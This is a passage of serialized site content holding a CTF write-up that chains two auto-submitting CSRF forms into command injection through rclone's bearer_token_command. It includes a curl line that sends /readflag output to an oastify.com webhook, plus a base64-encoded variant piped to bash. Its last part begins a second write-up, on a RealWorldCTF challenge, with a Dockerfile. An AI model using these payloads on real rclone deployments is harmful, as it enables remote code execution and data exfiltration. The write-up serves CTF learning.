24294},{"style":312},[24295],{"type":38,"value":762},{"type":33,"tag":128,"props":24297,"children":24298},{"class":130,"line":765},[24299,24303,24307,24311,24315,24319,24323,24327,24331,24335,24339,24343],{"type":33,"tag":128,"props":24300,"children":24301},{"style":306},[24302],{"type":38,"value":8266},{"type":33,"tag":128,"props":24304,"children":24305},{"style":312},[24306],{"type":38,"value":215},{"type":33,"tag":128,"props":24308,"children":24309},{"style":135},[24310],{"type":38,"value":21192},{"type":33,"tag":128,"props":24312,"children":24313},{"style":312},[24314],{"type":38,"value":5566},{"type":33,"tag":128,"props":24316,"children":24317},{"style":676},[24318],{"type":38,"value":669},{"type":33,"tag":128,"props":24320,"children":24321},{"style":140},[24322],{"type":38,"value":21258},{"type":33,"tag":128,"props":24324,"children":24325},{"style":676},[24326],{"type":38,"value":669},{"type":33,"tag":128,"props":24328,"children":24329},{"style":312},[24330],{"type":38,"value":5584},{"type":33,"tag":128,"props":24332,"children":24333},{"style":676},[24334],{"type":38,"value":679},{"type":33,"tag":128,"props":24336,"children":24337},{"style":140},[24338],{"type":38,"value":21222},{"type":33,"tag":128,"props":24340,"children":24341},{"style":676},[24342],{"type":38,"value":669},{"type":33,"tag":128,"props":24344,"children":24345},{"style":312},[24346],{"type":38,"value":5815},{"type":33,"tag":128,"props":24348,"children":24349},{"class":130,"line":804},[24350,24354,24359],{"type":33,"tag":128,"props":24351,"children":24352},{"style":312},[24353],{"type":38,"value":8403},{"type":33,"tag":128,"props":24355,"children":24356},{"style":523},[24357],{"type":38,"value":24358}," 300",{"type":33,"tag":128,"props":24360,"children":24361},{"style":312},[24362],{"type":38,"value":5815},{"type":33,"tag":128,"props":24364,"children":24365},{"class":130,"line":839},[24366,24370,24374],{"type":33,"tag":128,"props":24367,"children":24368},{"style":312},[24369],{"type":38,"value":6190},{"type":33,"tag":128,"props":24371,"children":24372},{"style":1576},[24373],{"type":38,"value":15064},{"type":33,"tag":128,"props":24375,"children":24376},{"style":312},[24377],{"type":38,"value":6097},{"type":33,"tag":47,"props":24379,"children":24380},{},[24381],{"type":38,"value":24382},"First CSRF allowing us to create our \"remote\" of type webdav. We will find the parameters we described earlier in the body in this case we need to encode it and pass it as a query parameter.",{"type":33,"tag":114,"props":24384,"children":24385},{"lang":5929},[24386],{"type":33,"tag":119,"props":24387,"children":24389},{"code":24388,"language":5929,"meta":8,"className":5933,"style":8},"\u003C!-- 1.html -->\n \u003Cform method=\"POST\" action='http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+touch${IFS}/tmp/lolipop_from_bot\"}&name=test_csrf&type=webdav'>\n \u003Cinput type=\"submit\" value=\"CSRF\" />\n \u003Cscript>\n document.forms[0].submit();\n \u003C/script>\n\u003C/form>\n",[24390],{"type":33,"tag":105,"props":24391,"children":24392},{"__ignoreMap":8},[24393,24401,24458,24515,24530,24567,24582],{"type":33,"tag":128,"props":24394,"children":24395},{"class":130,"line":131},[24396],{"type":33,"tag":128,"props":24397,"children":24398},{"style":5541},[24399],{"type":38,"value":24400},"\u003C!-- 1.html -->\n",{"type":33,"tag":128,"props":24402,"children":24403},{"class":130,"line":362},[24404,24408,24412,24417,24421,24425,24429,24433,24437,24441,24445,24450,24454],{"type":33,"tag":128,"props":24405,"children":24406},{"style":312},[24407],{"type":38,"value":9102},{"type":33,"tag":128,"props":24409,"children":24410},{"style":1576},[24411],{"type":38,"value":14844},{"type":33,"tag":128,"props":24413,"children":24414},{"style":306},[24415],{"type":38,"value":24416}," method",{"type":33,"tag":128,"props":24418,"children":24419},{"style":312},[24420],{"type":38,"value":315},{"type":33,"tag":128,"props":24422,"children":24423},{"style":676},[24424],{"type":38,"value":669},{"type":33,"tag":128,"props":24426,"children":24427},{"style":140},[24428],{"type":38,"value":1406},{"type":33,"tag":128,"props":24430,"children":24431},{"style":676},[24432],{"type":38,"value":669},{"type":33,"tag":128,"props":24434,"children":24435},{"style":306},[24436],{"type":38,"value":14849},{"type":33,"tag":128,"props":24438,"children":24439},{"style":312},[24440],{"type":38,"value":315},{"type":33,"tag":128,"props":24442,"children":24443},{"style":676},[24444],{"type":38,"value":6040},{"type":33,"tag":128,"props":24446,"children":24447},{"style":140},[24448],{"type":38,"value":24449},"http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+touch${IFS}/tmp/lolipop_from_bot\"}&name=test_csrf&type=webdav",{"type":33,"tag":128,"props":24451,"children":24452},{"style":676},[24453],{"type":38,"value":6040},{"type":33,"tag":128,"props":24455,"children":24456},{"style":312},[24457],{"type":38,"value":6097},{"type":33,"tag":128,"props":24459,"children":24460},{"class":130,"line":403},[24461,24465,24469,24473,24477,24481,24485,24489,24493,24497,24501,24506,24510],{"type":33,"tag":128,"props":24462,"children":24463},{"style":312},[24464],{"type":38,"value":6067},{"type":33,"tag":128,"props":24466,"children":24467},{"style":1576},[24468],{"type":38,"value":14882},{"type":33,"tag":128,"props":24470,"children":24471},{"style":306},[24472],{"type":38,"value":14887},{"type":33,"tag":128,"props":24474,"children":24475},{"style":312},[24476],{"type":38,"value":315},{"type":33,"tag":128,"props":24478,"children":24479},{"style":676},[24480],{"type":38,"value":669},{"type":33,"tag":128,"props":24482,"children":24483},{"style":140},[24484],{"type":38,"value":14977},{"type":33,"tag":128,"props":24486,"children":24487},{"style":676},[24488],{"type":38,"value":669},{"type":33,"tag":128,"props":24490,"children":24491},{"style":306},[24492],{"type":38,"value":13031},{"type":33,"tag":128,"props":24494,"children":24495},{"style":312},[24496],{"type":38,"value":315},{"type":33,"tag":128,"props":24498,"children":24499},{"style":676},[24500],{"type":38,"value":669},{"type":33,"tag":128,"props":24502,"children":24503},{"style":140},[24504],{"type":38,"value":24505},"CSRF",{"type":33,"tag":128,"props":24507,"children":24508},{"style":676},[24509],{"type":38,"value":669},{"type":33,"tag":128,"props":24511,"children":24512},{"style":312},[24513],{"type":38,"value":24514}," />\n",{"type":33,"tag":128,"props":24516,"children":24517},{"class":130,"line":739},[24518,24522,24526],{"type":33,"tag":128,"props":24519,"children":24520},{"style":312},[24521],{"type":38,"value":6067},{"type":33,"tag":128,"props":24523,"children":24524},{"style":1576},[24525],{"type":38,"value":15064},{"type":33,"tag":128,"props":24527,"children":24528},{"style":312},[24529],{"type":38,"value":6097},{"type":33,"tag":128,"props":24531,"children":24532},{"class":130,"line":765},[24533,24538,24542,24547,24551,24555,24559,24563],{"type":33,"tag":128,"props":24534,"children":24535},{"style":306},[24536],{"type":38,"value":24537}," document",{"type":33,"tag":128,"props":24539,"children":24540},{"style":312},[24541],{"type":38,"value":215},{"type":33,"tag":128,"props":24543,"children":24544},{"style":306},[24545],{"type":38,"value":24546},"forms",{"type":33,"tag":128,"props":24548,"children":24549},{"style":312},[24550],{"type":38,"value":344},{"type":33,"tag":128,"props":24552,"children":24553},{"style":523},[24554],{"type":38,"value":10442},{"type":33,"tag":128,"props":24556,"children":24557},{"style":312},[24558],{"type":38,"value":8230},{"type":33,"tag":128,"props":24560,"children":24561},{"style":135},[24562],{"type":38,"value":14977},{"type":33,"tag":128,"props":24564,"children":24565},{"style":312},[24566],{"type":38,"value":15496},{"type":33,"tag":128,"props":24568,"children":24569},{"class":130,"line":804},[24570,24574,24578],{"type":33,"tag":128,"props":24571,"children":24572},{"style":312},[24573],{"type":38,"value":6206},{"type":33,"tag":128,"props":24575,"children":24576},{"style":1576},[24577],{"type":38,"value":15064},{"type":33,"tag":128,"props":24579,"children":24580},{"style":312},[24581],{"type":38,"value":6097},{"type":33,"tag":128,"props":24583,"children":24584},{"class":130,"line":839},[24585,24589,24593],{"type":33,"tag":128,"props":24586,"children":24587},{"style":312},[24588],{"type":38,"value":6190},{"type":33,"tag":128,"props":24590,"children":24591},{"style":1576},[24592],{"type":38,"value":14844},{"type":33,"tag":128,"props":24594,"children":24595},{"style":312},[24596],{"type":38,"value":6097},{"type":33,"tag":47,"props":24598,"children":24599},{},[24600,24602,24608],{"type":38,"value":24601},"The second CSRF allows listing the files present in ",{"type":33,"tag":105,"props":24603,"children":24605},{"className":24604},[],[24606],{"type":38,"value":24607},"remote",{"type":38,"value":24609},", this action will then trigger our command passed as a parameter in the previous CSRF",{"type":33,"tag":114,"props":24611,"children":24612},{"lang":5929},[24613],{"type":33,"tag":119,"props":24614,"children":24616},{"code":24615,"language":5929,"meta":8,"className":5933,"style":8},"\u003C!-- 2.html -->\n\u003Cform method=\"POST\" action='http://rclone:5572/operations/list?fs=test_csrf:&remote='>\n \u003Cinput type=\"submit\" value=\"CSRF\" />\n \u003Cscript>\n document.forms[0].submit();\n \u003C/script>\n\u003C/form>\n",[24617],{"type":33,"tag":105,"props":24618,"children":24619},{"__ignoreMap":8},[24620,24628,24684,24739,24754,24789,24804],{"type":33,"tag":128,"props":24621,"children":24622},{"class":130,"line":131},[24623],{"type":33,"tag":128,"props":24624,"children":24625},{"style":5541},[24626],{"type":38,"value":24627},"\u003C!-- 2.html -->\n",{"type":33,"tag":128,"props":24629,"children":24630},{"class":130,"line":362},[24631,24635,24639,24643,24647,24651,24655,24659,24663,24667,24671,24676,24680],{"type":33,"tag":128,"props":24632,"children":24633},{"style":312},[24634],{"type":38,"value":5977},{"type":33,"tag":128,"props":24636,"children":24637},{"style":1576},[24638],{"type":38,"value":14844},{"type":33,"tag":128,"props":24640,"children":24641},{"style":306},[24642],{"type":38,"value":24416},{"type":33,"tag":128,"props":24644,"children":24645},{"style":312},[24646],{"type":38,"value":315},{"type":33,"tag":128,"props":24648,"children":24649},{"style":676},[24650],{"type":38,"value":669},{"type":33,"tag":128,"props":24652,"children":24653},{"style":140},[24654],{"type":38,"value":1406},{"type":33,"tag":128,"props":24656,"children":24657},{"style":676},[24658],{"type":38,"value":669},{"type":33,"tag":128,"props":24660,"children":24661},{"style":306},[24662],{"type":38,"value":14849},{"type":33,"tag":128,"props":24664,"children":24665},{"style":312},[24666],{"type":38,"value":315},{"type":33,"tag":128,"props":24668,"children":24669},{"style":676},[24670],{"type":38,"value":6040},{"type":33,"tag":128,"props":24672,"children":24673},{"style":140},[24674],{"type":38,"value":24675},"http://rclone:5572/operations/list?fs=test_csrf:&remote=",{"type":33,"tag":128,"props":24677,"children":24678},{"style":676},[24679],{"type":38,"value":6040},{"type":33,"tag":128,"props":24681,"children":24682},{"style":312},[24683],{"type":38,"value":6097},{"type":33,"tag":128,"props":24685,"children":24686},{"class":130,"line":403},[24687,24691,24695,24699,24703,24707,24711,24715,24719,24723,24727,24731,24735],{"type":33,"tag":128,"props":24688,"children":24689},{"style":312},[24690],{"type":38,"value":6067},{"type":33,"tag":128,"props":24692,"children":24693},{"style":1576},[24694],{"type":38,"value":14882},{"type":33,"tag":128,"props":24696,"children":24697},{"style":306},[24698],{"type":38,"value":14887},{"type":33,"tag":128,"props":24700,"children":24701},{"style":312},[24702],{"type":38,"value":315},{"type":33,"tag":128,"props":24704,"children":24705},{"style":676},[24706],{"type":38,"value":669},{"type":33,"tag":128,"props":24708,"children":24709},{"style":140},[24710],{"type":38,"value":14977},{"type":33,"tag":128,"props":24712,"children":24713},{"style":676},[24714],{"type":38,"value":669},{"type":33,"tag":128,"props":24716,"children":24717},{"style":306},[24718],{"type":38,"value":13031},{"type":33,"tag":128,"props":24720,"children":24721},{"style":312},[24722],{"type":38,"value":315},{"type":33,"tag":128,"props":24724,"children":24725},{"style":676},[24726],{"type":38,"value":669},{"type":33,"tag":128,"props":24728,"children":24729},{"style":140},[24730],{"type":38,"value":24505},{"type":33,"tag":128,"props":24732,"children":24733},{"style":676},[24734],{"type":38,"value":669},{"type":33,"tag":128,"props":24736,"children":24737},{"style":312},[24738],{"type":38,"value":24514},{"type":33,"tag":128,"props":24740,"children":24741},{"class":130,"line":739},[24742,24746,24750],{"type":33,"tag":128,"props":24743,"children":24744},{"style":312},[24745],{"type":38,"value":6067},{"type":33,"tag":128,"props":24747,"children":24748},{"style":1576},[24749],{"type":38,"value":15064},{"type":33,"tag":128,"props":24751,"children":24752},{"style":312},[24753],{"type":38,"value":6097},{"type":33,"tag":128,"props":24755,"children":24756},{"class":130,"line":765},[24757,24761,24765,24769,24773,24777,24781,24785],{"type":33,"tag":128,"props":24758,"children":24759},{"style":306},[24760],{"type":38,"value":24537},{"type":33,"tag":128,"props":24762,"children":24763},{"style":312},[24764],{"type":38,"value":215},{"type":33,"tag":128,"props":24766,"children":24767},{"style":306},[24768],{"type":38,"value":24546},{"type":33,"tag":128,"props":24770,"children":24771},{"style":312},[24772],{"type":38,"value":344},{"type":33,"tag":128,"props":24774,"children":24775},{"style":523},[24776],{"type":38,"value":10442},{"type":33,"tag":128,"props":24778,"children":24779},{"style":312},[24780],{"type":38,"value":8230},{"type":33,"tag":128,"props":24782,"children":24783},{"style":135},[24784],{"type":38,"value":14977},{"type":33,"tag":128,"props":24786,"children":24787},{"style":312},[24788],{"type":38,"value":15496},{"type":33,"tag":128,"props":24790,"children":24791},{"class":130,"line":804},[24792,24796,24800],{"type":33,"tag":128,"props":24793,"children":24794},{"style":312},[24795],{"type":38,"value":6206},{"type":33,"tag":128,"props":24797,"children":24798},{"style":1576},[24799],{"type":38,"value":15064},{"type":33,"tag":128,"props":24801,"children":24802},{"style":312},[24803],{"type":38,"value":6097},{"type":33,"tag":128,"props":24805,"children":24806},{"class":130,"line":839},[24807,24811,24815],{"type":33,"tag":128,"props":24808,"children":24809},{"style":312},[24810],{"type":38,"value":6190},{"type":33,"tag":128,"props":24812,"children":24813},{"style":1576},[24814],{"type":38,"value":14844},{"type":33,"tag":128,"props":24816,"children":24817},{"style":312},[24818],{"type":38,"value":6097},{"type":33,"tag":47,"props":24820,"children":24821},{},[24822],{"type":38,"value":24823},"If we go to the dashboard we can see that a new remote has been created named \"CSRF\".",{"type":33,"tag":75,"props":24825,"children":24827},{"imgSrc":24826},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721252881/writeups/rclone_dashboard.webp",[],{"type":33,"tag":47,"props":24829,"children":24830},{},[24831],{"type":38,"value":24832},"Also, we can see that in the /tmp folder a file named lolipop_from_bot has indeed been created",{"type":33,"tag":75,"props":24834,"children":24836},{"imgSrc":24835},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721252881/writeups/ls_tmp_from_bot.webp",[],{"type":33,"tag":47,"props":24838,"children":24839},{},[24840],{"type":38,"value":24841},"Now that we have POC the RCE via the bot, another problem arises: we do not have the possibility to retrieve the flag directly from the rclone docker because it does not have internet access. However, the rclone service is on the same network as the bot. To do this, we will need to go through the bot that will forward the information to us.",{"type":33,"tag":40,"props":24843,"children":24844},{"id":21053},[24845],{"type":38,"value":21056},{"type":33,"tag":47,"props":24847,"children":24848},{},[24849],{"type":38,"value":24850},"As previously mentioned, our final bash payload will look like this:\nIt makes a request to the bot that passes a webhook URL in the body, and the flag is passed in the webhook URL.",{"type":33,"tag":114,"props":24852,"children":24853},{"lang":116},[24854],{"type":33,"tag":119,"props":24855,"children":24857},{"code":24856,"language":116,"meta":8,"className":121,"style":8},"curl -H \"Content-type: application/x-www-form-urlencoded\" -d \"url=https://r7z7f6ul1nguh27mf65wveqeu500osch.oastify.com/?flag=$(/readflag | base64)\" http://bot:8000/submit\n",[24858],{"type":33,"tag":105,"props":24859,"children":24860},{"__ignoreMap":8},[24861],{"type":33,"tag":128,"props":24862,"children":24863},{"class":130,"line":131},[24864,24868,24873,24877,24882,24886,24891,24895,24900,24904,24908,24912,24916,24920,24924],{"type":33,"tag":128,"props":24865,"children":24866},{"style":135},[24867],{"type":38,"value":2882},{"type":33,"tag":128,"props":24869,"children":24870},{"style":151},[24871],{"type":38,"value":24872}," -H",{"type":33,"tag":128,"props":24874,"children":24875},{"style":676},[24876],{"type":38,"value":679},{"type":33,"tag":128,"props":24878,"children":24879},{"style":140},[24880],{"type":38,"value":24881},"Content-type: application/x-www-form-urlencoded",{"type":33,"tag":128,"props":24883,"children":24884},{"style":676},[24885],{"type":38,"value":669},{"type":33,"tag":128,"props":24887,"children":24888},{"style":151},[24889],{"type":38,"value":24890}," -d",{"type":33,"tag":128,"props":24892,"children":24893},{"style":676},[24894],{"type":38,"value":679},{"type":33,"tag":128,"props":24896,"children":24897},{"style":140},[24898],{"type":38,"value":24899},"url=https://r7z7f6ul1nguh27mf65wveqeu500osch.oastify.com/?flag=",{"type":33,"tag":128,"props":24901,"children":24902},{"style":312},[24903],{"type":38,"value":2953},{"type":33,"tag":128,"props":24905,"children":24906},{"style":135},[24907],{"type":38,"value":5294},{"type":33,"tag":128,"props":24909,"children":24910},{"style":300},[24911],{"type":38,"value":10195},{"type":33,"tag":128,"props":24913,"children":24914},{"style":135},[24915],{"type":38,"value":10200},{"type":33,"tag":128,"props":24917,"children":24918},{"style":312},[24919],{"type":38,"value":2966},{"type":33,"tag":128,"props":24921,"children":24922},{"style":676},[24923],{"type":38,"value":669},{"type":33,"tag":128,"props":24925,"children":24926},{"style":140},[24927],{"type":38,"value":24928}," http://bot:8000/submit\n",{"type":33,"tag":47,"props":24930,"children":24931},{},[24932],{"type":38,"value":24933},"For more flexibility, we will encode our payload in base64 and pass it in bash command like this:",{"type":33,"tag":114,"props":24935,"children":24936},{"lang":116},[24937],{"type":33,"tag":119,"props":24938,"children":24940},{"code":24939,"language":116,"meta":8,"className":121,"style":8},"bash -c \"echo Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d | base64 -d |bash\"\n",[24941],{"type":33,"tag":105,"props":24942,"children":24943},{"__ignoreMap":8},[24944],{"type":33,"tag":128,"props":24945,"children":24946},{"class":130,"line":131},[24947,24951,24955,24959,24964],{"type":33,"tag":128,"props":24948,"children":24949},{"style":135},[24950],{"type":38,"value":116},{"type":33,"tag":128,"props":24952,"children":24953},{"style":151},[24954],{"type":38,"value":8707},{"type":33,"tag":128,"props":24956,"children":24957},{"style":676},[24958],{"type":38,"value":679},{"type":33,"tag":128,"props":24960,"children":24961},{"style":140},[24962],{"type":38,"value":24963},"echo Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d | base64 -d |bash",{"type":33,"tag":128,"props":24965,"children":24966},{"style":676},[24967],{"type":38,"value":836},{"type":33,"tag":47,"props":24969,"children":24970},{},[24971],{"type":38,"value":24972},"Our final payload fully encoded using in our CSRF will look like this:",{"type":33,"tag":114,"props":24974,"children":24975},{"lang":5929},[24976],{"type":33,"tag":119,"props":24977,"children":24979},{"code":24978,"language":5929,"meta":8,"className":5933,"style":8},"\u003Cform method=\"POST\" action='http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+echo${IFS}Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d|${IFS}base64${IFS}-d|${IFS}bash\"}&name=csrf&type=webdav'>\n \u003Cinput type=\"submit\" value=\"CSRF\" />\n \u003Cscript>\n document.forms[0].submit();\n \u003C/script>\n\u003C/form>\n",[24980],{"type":33,"tag":105,"props":24981,"children":24982},{"__ignoreMap":8},[24983,25039,25094,25109,25144,25159],{"type":33,"tag":128,"props":24984,"children":24985},{"class":130,"line":131},[24986,24990,24994,24998,25002,25006,25010,25014,25018,25022,25026,25031,25035],{"type":33,"tag":128,"props":24987,"children":24988},{"style":312},[24989],{"type":38,"value":5977},{"type":33,"tag":128,"props":24991,"children":24992},{"style":1576},[24993],{"type":38,"value":14844},{"type":33,"tag":128,"props":24995,"children":24996},{"style":306},[24997],{"type":38,"value":24416},{"type":33,"tag":128,"props":24999,"children":25000},{"style":312},[25001],{"type":38,"value":315},{"type":33,"tag":128,"props":25003,"children":25004},{"style":676},[25005],{"type":38,"value":669},{"type":33,"tag":128,"props":25007,"children":25008},{"style":140},[25009],{"type":38,"value":1406},{"type":33,"tag":128,"props":25011,"children":25012},{"style":676},[25013],{"type":38,"value":669},{"type":33,"tag":128,"props":25015,"children":25016},{"style":306},[25017],{"type":38,"value":14849},{"type":33,"tag":128,"props":25019,"children":25020},{"style":312},[25021],{"type":38,"value":315},{"type":33,"tag":128,"props":25023,"children":25024},{"style":676},[25025],{"type":38,"value":6040},{"type":33,"tag":128,"props":25027,"children":25028},{"style":140},[25029],{"type":38,"value":25030},"http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+echo${IFS}Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d|${IFS}base64${IFS}-d|${IFS}bash\"}&name=csrf&type=webdav",{"type":33,"tag":128,"props":25032,"children":25033},{"style":676},[25034],{"type":38,"value":6040},{"type":33,"tag":128,"props":25036,"children":25037},{"style":312},[25038],{"type":38,"value":6097},{"type":33,"tag":128,"props":25040,"children":25041},{"class":130,"line":362},[25042,25046,25050,25054,25058,25062,25066,25070,25074,25078,25082,25086,25090],{"type":33,"tag":128,"props":25043,"children":25044},{"style":312},[25045],{"type":38,"value":6067},{"type":33,"tag":128,"props":25047,"children":25048},{"style":1576},[25049],{"type":38,"value":14882},{"type":33,"tag":128,"props":25051,"children":25052},{"style":306},[25053],{"type":38,"value":14887},{"type":33,"tag":128,"props":25055,"children":25056},{"style":312},[25057],{"type":38,"value":315},{"type":33,"tag":128,"props":25059,"children":25060},{"style":676},[25061],{"type":38,"value":669},{"type":33,"tag":128,"props":25063,"children":25064},{"style":140},[25065],{"type":38,"value":14977},{"type":33,"tag":128,"props":25067,"children":25068},{"style":676},[25069],{"type":38,"value":669},{"type":33,"tag":128,"props":25071,"children":25072},{"style":306},[25073],{"type":38,"value":13031},{"type":33,"tag":128,"props":25075,"children":25076},{"style":312},[25077],{"type":38,"value":315},{"type":33,"tag":128,"props":25079,"children":25080},{"style":676},[25081],{"type":38,"value":669},{"type":33,"tag":128,"props":25083,"children":25084},{"style":140},[25085],{"type":38,"value":24505},{"type":33,"tag":128,"props":25087,"children":25088},{"style":676},[25089],{"type":38,"value":669},{"type":33,"tag":128,"props":25091,"children":25092},{"style":312},[25093],{"type":38,"value":24514},{"type":33,"tag":128,"props":25095,"children":25096},{"class":130,"line":403},[25097,25101,25105],{"type":33,"tag":128,"props":25098,"children":25099},{"style":312},[25100],{"type":38,"value":6067},{"type":33,"tag":128,"props":25102,"children":25103},{"style":1576},[25104],{"type":38,"value":15064},{"type":33,"tag":128,"props":25106,"children":25107},{"style":312},[25108],{"type":38,"value":6097},{"type":33,"tag":128,"props":25110,"children":25111},{"class":130,"line":739},[25112,25116,25120,25124,25128,25132,25136,25140],{"type":33,"tag":128,"props":25113,"children":25114},{"style":306},[25115],{"type":38,"value":24537},{"type":33,"tag":128,"props":25117,"children":25118},{"style":312},[25119],{"type":38,"value":215},{"type":33,"tag":128,"props":25121,"children":25122},{"style":306},[25123],{"type":38,"value":24546},{"type":33,"tag":128,"props":25125,"children":25126},{"style":312},[25127],{"type":38,"value":344},{"type":33,"tag":128,"props":25129,"children":25130},{"style":523},[25131],{"type":38,"value":10442},{"type":33,"tag":128,"props":25133,"children":25134},{"style":312},[25135],{"type":38,"value":8230},{"type":33,"tag":128,"props":25137,"children":25138},{"style":135},[25139],{"type":38,"value":14977},{"type":33,"tag":128,"props":25141,"children":25142},{"style":312},[25143],{"type":38,"value":15496},{"type":33,"tag":128,"props":25145,"children":25146},{"class":130,"line":765},[25147,25151,25155],{"type":33,"tag":128,"props":25148,"children":25149},{"style":312},[25150],{"type":38,"value":6206},{"type":33,"tag":128,"props":25152,"children":25153},{"style":1576},[25154],{"type":38,"value":15064},{"type":33,"tag":128,"props":25156,"children":25157},{"style":312},[25158],{"type":38,"value":6097},{"type":33,"tag":128,"props":25160,"children":25161},{"class":130,"line":804},[25162,25166,25170],{"type":33,"tag":128,"props":25163,"children":25164},{"style":312},[25165],{"type":38,"value":6190},{"type":33,"tag":128,"props":25167,"children":25168},{"style":1576},[25169],{"type":38,"value":14844},{"type":33,"tag":128,"props":25171,"children":25172},{"style":312},[25173],{"type":38,"value":6097},{"type":33,"tag":47,"props":25175,"children":25176},{},[25177],{"type":38,"value":25178},"Same as before, we need to create another CSRF to trigger the command.",{"type":33,"tag":47,"props":25180,"children":25181},{},[25182],{"type":38,"value":25183},"We now just need to host these files on a site that the bot can access and submit the URL to the bot.",{"type":33,"tag":47,"props":25185,"children":25186},{},[25187],{"type":38,"value":25188},"And our webhook will receive the flag:",{"type":33,"tag":75,"props":25190,"children":25192},{"imgSrc":25191},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721248952/writeups/rclone/flag_webhook.webp",[],{"type":33,"tag":5227,"props":25194,"children":25195},{},[25196],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":25198},[25199,25200,25201,25202,25203],{"id":42,"depth":362,"text":45},{"id":22881,"depth":362,"text":22884},{"id":23885,"depth":362,"text":23888},{"id":24069,"depth":362,"text":24072},{"id":21053,"depth":362,"text":21056},"content:writeups:rclone.md","writeups/rclone.md","writeups/rclone",{"_path":25208,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":25209,"description":8,"head":25210,"body":25228,"_type":5240,"_id":29225,"_source":5242,"_file":29226,"_stem":29227,"_extension":5245},"/writeups/chatter-box","ChatterBox",{"title":25211,"description":25212,"keywords":25213,"slug":25214,"image":25215,"date":25216,"meta":25217},"ChatterBox [UNINTENDED]","ChatterBox was a medium web challenge from RealWorldCTF 2024.","web,sqli,rce","chatter-box","https://res.cloudinary.com/dmju5zuhr/image/upload/v1706549525/writeups/real_world_ctf.webp","2024-01-27",[25218,25219,25220,25221,25222,25224,25225,25226],{"og:image":25215},{"og:title":25211},{"og:description":25212},{"og:type":21},{"og:url":25223},"https://owalid.com/chatter-box",{"description":25212},{"title":25211},{"keywords":25227},"web,sqli,rce,realworldctf,realworld,ctf,ChatterBox",{"type":30,"children":25229,"toc":29218},[25230,25235,25239,25243,25248,25252,25257,25497,25501,25505,25510,25534,25539,25545,25550,25622,25627,25631,25637,25642,25647,25659,25664,25669,25673,25678,25683,25688,25912,25918,25923,25936,26342,26347,26903,26929,26934,26946,27354,27359,27364,27439,27460,27486,27491,27502,27522,27572,27584,27589,27600,27612,27623,27628,27674,27679,27683,27689,27694,27705,27725,27730,27735,27741,27746,27751,27770,27775,27796,27807,27812,27817,27821,27826,27831,27843,27848,27852,27857,27862,27910,27915,27919,27924,27929,27994,27998,28002,28015,28020,28085,28090,28094,28099,28107,28590,28598,29037,29045,29185,29205,29210,29214],{"type":33,"tag":34,"props":25231,"children":25233},{"id":25232},"chatterbox",[25234],{"type":38,"value":25209},{"type":33,"tag":40,"props":25236,"children":25237},{"id":42},[25238],{"type":38,"value":45},{"type":33,"tag":47,"props":25240,"children":25241},{},[25242],{"type":38,"value":25212},{"type":33,"tag":47,"props":25244,"children":25245},{},[25246],{"type":38,"value":25247},"We have the compiled source code in the form of a .jar file.",{"type":33,"tag":75,"props":25249,"children":25251},{"imgSrc":25250,":width":5304},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558660/writeups/chatter-box/files.webp",[],{"type":33,"tag":47,"props":25253,"children":25254},{},[25255],{"type":38,"value":25256},"If we look at the dockerfile in detail, we can see that an elf file /readflag is copied so we can therefore say that the goal of the challenge is to rce on the target server",{"type":33,"tag":114,"props":25258,"children":25259},{"lang":9966},[25260],{"type":33,"tag":119,"props":25261,"children":25263},{"code":25262,"language":9966,"meta":8,"className":22917,"style":8},"FROM openjdk:17-slim\n\nRUN apt update \\\n && apt install -y postgresql postgresql-contrib uuid vim gcc postgresql-13 postgresql-server-dev-13 file procps && apt install sudo -y\nRUN apt install -y libfindbin-libs-perl acl haveged\nRUN mkdir -p /logs && touch /logs/myapp.log && chmod 777 /logs/ && chmod 777 /logs/myapp.log\n\nCOPY init.sql /\nCOPY payload.c /tmp/\n\nUSER root\nUSER root\n\nCOPY ChatterBox-0.0.1-SNAPSHOT.jar /\nCOPY readflag /\nCOPY flag /\n\nRUN chmod 000 /flag\nCOPY start.sh /\nRUN chmod +x /start.sh\nENTRYPOINT 